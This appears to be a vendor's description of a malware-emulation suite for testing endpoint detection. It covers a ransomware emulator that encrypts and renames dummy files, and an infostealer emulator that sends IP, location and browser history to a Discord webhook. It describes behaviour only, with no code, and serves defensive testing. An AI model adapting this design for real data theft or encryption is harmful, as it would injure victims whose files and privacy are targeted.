This tool suite aims at emulating malware behaviour in order to evaluate EDR/EPP performance and detection capabilities. This tool should not present any danger: its behaviour is known because we've coded it from scratch, disclosed the source code, and also have proceeded to security code review.
The two available tools are:
- A ransomware emulator
- An information stealer emulator
You can download the binaries: here.
Once downloaded, extract the "stresstest-windows-executable.zip" archive in a directory of your choice, then run the executables. The binaries are standalone, you do not need to install anything else.
After you have run the test, you can simply delete the "testdir" directory that was created as well as the binaries themselves.
This first tool is composed of 3 binaries:
step_1_create_dummy_files.exeThe binary generates dummy files with various extensions (txt, pdf, png, xlsx...), they contain their own path and filename. The dummy files can be found in the "testdir" directory that is created where you run the binary.
step_2_encrypt_files.exeThis binary encrypts the content with a randomly generated 16 bytes key. It changes the name of the files and modifies the extensions as well. All of the new extensions are known ransomware extensions. In order for the files to be decrypted (optional), the key is stored in a file named "encryption_key.txt" in the same directory as testdir. The original filenames are stored in a pkl file named "original_filenames.pkl" in order to be restored. *** This step should trigger your EPP/EDR. ***
step_3_decrypt_files.exeThis binary decrypts the files and restores their original name and extension.
This tool requires you to setup a webhook on a private discord server in order to receive the information "stolen" from you.
You can find a tutorial: here.
steal_information.exeThis binary first prompts you to enter the webhook URL. It then proceeds to gather information from your computer and send it to the webhook you provided.
The information stolen is the following:
- ip address,
- mac address,
- location,
- browser history (last 25 visited sites)
- browser bookmarks.
In a real world scenario, the webhook would be controlled by the attacker and the url would not be provided by the victim. Real-life Infostealers usually also steal cookies, passwords, sensitive files, etc.
Here is a quick demonstration of the infostealer. On the left is the attacker's POV while the terminal would be on the victim's PC:
This tools suite is not intended for malicious use.
It is intended to be used for security assessment purposes only.
If you use this script for malicious purposes, you are breaking the law.
This test is included in our "ransomware stress-test" service ; you can learn more about it here: https://stresstest.bluetrusty.com/.